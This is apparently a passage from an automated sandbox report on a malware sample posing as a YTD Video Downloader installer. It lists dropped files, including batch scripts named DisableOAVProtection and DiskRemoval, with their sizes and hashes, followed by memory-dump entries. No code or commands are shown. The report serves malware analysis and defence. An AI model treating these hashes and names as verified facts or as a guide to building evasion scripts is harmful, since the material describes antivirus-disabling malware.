2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\ksRHo\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\ksRHo\DisableOAVProtection.bat
Filesize
136KB

MD5
ed77c2b2866fc09850a317f2620f4f9c

SHA1
ed1d7485a1111bd553ffe81927260652718a1c39

SHA256
763c290bbc1bfaedb53c909a63453d88204680ff6b5e50d7c68b14accc706c17

SHA512
4ed12352142c38750656780acf836805f3190a21aeab117e1c62fa06cf54920754c598daba3e02a981b6440261ce211e5717f6f1183cfebf6c8805d8201fa0e2

Download Submit
C:\ProgramData\ksRHo\DiskRemoval.bat
Filesize
211B

MD5
0f00552cee3a31dc4e8adc2738ca6d76

SHA1
85f0353b58b6749eee6b06101b05db242d44d0c2

SHA256
1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

SHA512
137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

Download Submit
C:\ProgramData\ksRHo\MMF.vbs
Filesize
67KB

MD5
62c210400fef1cb41efa4c8b2c963964

SHA1
fa471dcf721b5f61a8794a75e3a9226e79b3ec80

SHA256
ac5fa9691beee8045bc5b4e4ede4816339cbef901f4d7c83f70e64e8c5f10d10

SHA512
64d99cd6a739bee853820172b24408173c4799f6c61037ad212cb56434fba7f014f58b2f88bcd209fdfd5976a183cd3d91588fc8f274fced444e726cf8e25d5a

Download Submit
C:\ProgramData\ksRHo\extracted\ANTIAV~1.DAT
Filesize
2.0MB

MD5
98b40633ad9ed474b501858eaf95a5e2

SHA1
a021606bc9cad62813e7b3ecc46ce1dd11f68626

SHA256
f2eb6e6dab594455f0ddf9a30f9f1cdb40c0789b14c6f7150a63df3029f8f023

SHA512
470a25c7ee6bc6efa11a21708915c918e3ead2394db5db8a1b758e15945466cc17a861f43f1dae8a396094a63b68eb2339769dd345db2925ee873524d9ea681c

Download Submit
C:\ProgramData\ksRHo\extracted\file_1.zip
Filesize
3.3MB

MD5
35f26c903cf0767f4abce71d98b5876d

SHA1
be89ca726a39d27a93919a0fbeb3c537769c2d2f

SHA256
4f26044911e8b77343a11d011c6bc92fff56d5182ed82d75edfd2e0893250f37

SHA512
b778187dd9931e02226b654eddbdc00a1f438a91ffcd8fa0fc130018759066d74aa9b4bc8148a0cf22e961e573e6b144469648105db3c595e17011ade9a1e945

Download Submit
C:\ProgramData\ksRHo\extracted\file_2.zip
Filesize
3.3MB

MD5
8a67f88eca9431e55627b34be2e8a84e

SHA1
4d259bffc31f3a0148d009f1ef412d25c42326e0

SHA256
5d789b9194de03984b0af00fb4831225d526c812ddabe9c3cabdcf269b784a1e

SHA512
7d9e8190bc61decfa2bf61797ebdc5bd50b2652dfa9b30f8f27ddcc500d415b46f35b1f1d8daab2ea70995b859f5942ee89d4f7cb3e9107da65be8f65012660e

Download Submit
C:\ProgramData\ksRHo\extracted\file_3.zip
Filesize
3.3MB

MD5
d0cc732732bf8be0bf08a6b5d8b65406

SHA1
0cf74e971ddbd71f66959dc19c11cc827e9b32b3

SHA256
25185d1234e7c93a7d8e650c033ce0f8a99a3882a4137ca2dfc2043e4d312d05

SHA512
3631d3f64947835a12322b97dc185b2915e9286f612fd701aef2b052a510a310fa6b3590599fb0550f90dc7c1938fd8a2862e9170e02c205aa8fcea361813798

Download Submit
C:\ProgramData\ksRHo\extracted\file_4.zip
Filesize
3.3MB

MD5
acdfeefb0e7e0f4caa08d17f029097ac

SHA1
6ec910af6e5310efbd7705bd4559c036eeeffe1d

SHA256
5b04f2f3020beaf54624b027bac736a7f0df621b3b10f2ca36eb70c5ab3a4998

SHA512
443dfe57378186d3af3548533ca86dd9284ec1517a5f719f3816835bc64c05a4549d78088c2208295f456618f4af426109a3d3a19a2562599cf5df42f9924c98

Download Submit
C:\ProgramData\ksRHo\extracted\file_5.zip
Filesize
4.8MB

MD5
a49a3df64df5ac8f7663c293c8f9b988

SHA1
b371b385f6856ddfc2fda4c207a9685a054c6c5c

SHA256
d011cb30824aa41c5083941994c882a0925fb9a72cd8b1bced3e1f49b3c759d6

SHA512
0a9b5271bd513584b9f69017cb08d526e59c760a692641177fb281f4b64b06bf95ea66d549ab13dbaa2b8e2cda4d72771e86bedd76041882b89bb13827845e66

Download Submit
C:\ProgramData\ksRHo\extracted\tGBpax_SqZ.exe
Filesize
5.1MB

MD5
c82505da7972f638a9aa294541f3ebd6

SHA1
4a24560d506285ea81e148a6902cae2bde1b26ac

SHA256
d55785c6b1fa6a3bf0370ea37a0b91b785460bb47f03dcfafc33eb5a6f7d7db6

SHA512
c212182e4e8061493a478f5c77147c0bd327894cc0b7ccb360b65f41b306c5dc548eeb89690fd748cadcf36e0567bb0f3c6028978fe8cd09af63cee2be9cdbf2

Download Submit
C:\ProgramData\ksRHo\file.bin
Filesize
4.8MB

MD5
ddeef4503c5c0b6f8f455679df51da81

SHA1
aca8b9ce01d7c14c882eff4a44823f68a55956e1

SHA256
eee9e6b60f2f8c585157e4431c14572d428d95a5928cee4a087b858a2a8a6e7e

SHA512
930ae0f43f2bb9dd28b400ac1296c9985bb5228a61b5f9f1f45dcb0e58270d10d6f84f736ed03e201534e59d1afbb5a10e6abbf411451a871285cf0f1344f6fb

Download Submit
C:\ProgramData\ksRHo\main.bat
Filesize
415B

MD5
93ecbb04a97f0b01468721390c49dd75

SHA1
f7f78ccadcbf2057cf5a77e52efee603c3c62c68

SHA256
68f78f7af15489552e50f00ff115216eaf9cfb9c3bf1792c8b9edd1c3afe0d40

SHA512
87ba7abceb1be94a63d3ddee9d2d4348f0d6fabefd1411a742b11acabe0f29d0ef1d44b78667aad73f234067db8407da5d7c9c0690925a5448061d5855eb5fa0

Download Submit
C:\ProgramData\ksRHo\tGBpax_SqZ.exe
Filesize
5.1MB

MD5
c82505da7972f638a9aa294541f3ebd6

SHA1
4a24560d506285ea81e148a6902cae2bde1b26ac

SHA256
d55785c6b1fa6a3bf0370ea37a0b91b785460bb47f03dcfafc33eb5a6f7d7db6

SHA512
c212182e4e8061493a478f5c77147c0bd327894cc0b7ccb360b65f41b306c5dc548eeb89690fd748cadcf36e0567bb0f3c6028978fe8cd09af63cee2be9cdbf2

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-2RN81.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4HVA9.tmp\b2p.dll
Filesize
22KB

MD5
ab35386487b343e3e82dbd2671ff9dab

SHA1
03591d07aea3309b631a7d3a6e20a92653e199b8

SHA256
c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

SHA512
b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4HVA9.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4HVA9.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4HVA9.tmp\iswin7logo.dll
Filesize
39KB

MD5
1ea948aad25ddd347d9b80bef6df9779

SHA1
0be971e67a6c3b1297e572d97c14f74b05dafed3

SHA256
30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

SHA512
f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-74QNP.tmp\7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp
Filesize
2.4MB

MD5
77ff3e55689b164e056ccf68b48c9f55

SHA1
1d6f7acc6dd6c01e0cd75677798299cd65ed4774

SHA256
f8fb0631406344e6e2ea1eb0507cd891d0ed788b0603141d1ce960a1abeeb031

SHA512
a7b5a19d8011134691c2fe99e8796407e2b8ba9d46736facf22ce274dcff509c994091f286372422ef518a06eb05b00e538f57e53b96096ff397b4806b8c760a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-ULH52.tmp\YTD.Video.Downloader.5.9.17.tmp
Filesize
911KB

MD5
d7da5b32daa4f02e8c335b409cf43914

SHA1
93f4b659962dc08483f41ab02d25ca4bb79a6f3e

SHA256
1e0610275a3e046891cf2986a9aab04bf80e188170f4a6882d9bdb896e1801b7

SHA512
af284e4c700998faf7aabb0c4eaa2405fc80ccad4cc44f9c14163b005e487588c80b9d99de0bb55ae3fd2e29deff3c6707b70e272146daacf4a3546dca6ffa2d

Download Submit
memory/64-184-0x0000000000000000-mapping.dmp

Download
memory/216-133-0x0000000000000000-mapping.dmp

Download
memory/392-154-0x0000000000000000-mapping.dmp

Download
memory/536-204-0x0000000000000000-mapping.dmp

Download
memory/552-157-0x0000000000000000-mapping.dmp

Download
memory/708-180-0x0000000000000000-mapping.dmp

Download
memory/780-208-0x0000000000000000-mapping.dmp

Download
memory/852-145-0x0000000000000000-mapping.dmp

Download
memory/1012-159-0x0000000000000000-mapping.dmp

Download
memory/1156-183-0x0000000000000000-mapping.dmp

Download
memory/1160-160-0x0000000000000000-mapping.dmp

Download
memory/1304-158-0x0000000000000000-mapping.dmp

Download
memory/1456-168-0x0000000000000000-mapping.dmp

Download
memory/1532-212-0x0000000000000000-mapping.dmp

Download
memory/1624-141-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/1624-138-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/1624-136-0x0000000000000000-mapping.dmp

Download
memory/1720-163-0x0000000000000000-mapping.dmp

Download
memory/1816-187-0x0000000000000000-mapping.dmp

Download
memory/2064-164-0x0000000000000000-mapping.dmp

Download
memory/2096-178-0x0000000000000000-mapping.dmp

Download
memory/2272-188-0x0000000000000000-mapping.dmp

Download
memory/2360-132-0x0000000000400000-0x00000000004C0000-memory.dmp

Filesize
768KB

Download
memory/2360-130-0x0000000000400000-0x00000000004C0000-memory.dmp

Filesize
768KB

Download
memory/2516-166-0x0000000000000000-mapping.dmp

Download
memory/2592-170-0x0000000000000000-mapping.dmp

Download
memory/2672-196-0x0000000000000000-mapping.dmp

Download
memory/2776-176-0x0000000000000000-mapping.dmp

Download
memory/3064-190-0x0000000000000000-mapping.dmp

Download
memory/3092-172-0x0000000000000000-mapping.dmp

Download
memory/3136-174-0x0000000000000000-mapping.dmp

Download
memory/3336-173-0x0000000000000000-mapping.dmp

Download
memory/3348-189-0x0000000000000000-mapping.dmp

Download
memory/3428-153-0x0000000000000000-mapping.dmp

Download
memory/3752-169-0x0000000000000000-mapping.dmp

Download
memory/3892-152-0x0000000000000000-mapping.dmp

Download
memory/3980-192-0x0000000000000000-mapping.dmp

Download
memory/4088-150-0x00000000096A0000-0x00000000096AF000-memory.dmp

Filesize
60KB

Download
memory/4088-221-0x00000000736D0000-0x00000000736EB000-memory.dmp

Filesize
108KB

Download
memory/4088-222-0x0000000007110000-0x0000000007113000-memory.dmp

Filesize
12KB

Download
memory/4088-142-0x0000000000000000-mapping.dmp

Download
memory/4144-177-0x0000000000000000-mapping.dmp

Download
memory/4448-181-0x0000000000000000-mapping.dmp

Download
memory/4612-182-0x0000000000000000-mapping.dmp

Download
memory/4732-200-0x0000000000000000-mapping.dmp

Download
memory/4768-156-0x0000000000000000-mapping.dmp

Download
memory/4820-185-0x0000000000000000-mapping.dmp

Download
memory/4840-179-0x0000000000000000-mapping.dmp

Download
memory/4860-186-0x0000000000000000-mapping.dmp

Download
memory/4864-167-0x0000000000000000-mapping.dmp

Download
memory/4928-218-0x0000000000000000-mapping.dmp

Download
memory/4932-165-0x0000000000000000-mapping.dmp

Download
memory/4948-155-0x0000000000000000-mapping.dmp

Download
memory/5004-162-0x0000000000000000-mapping.dmp

Download
memory/5012-161-0x0000000000000000-mapping.dmp

Download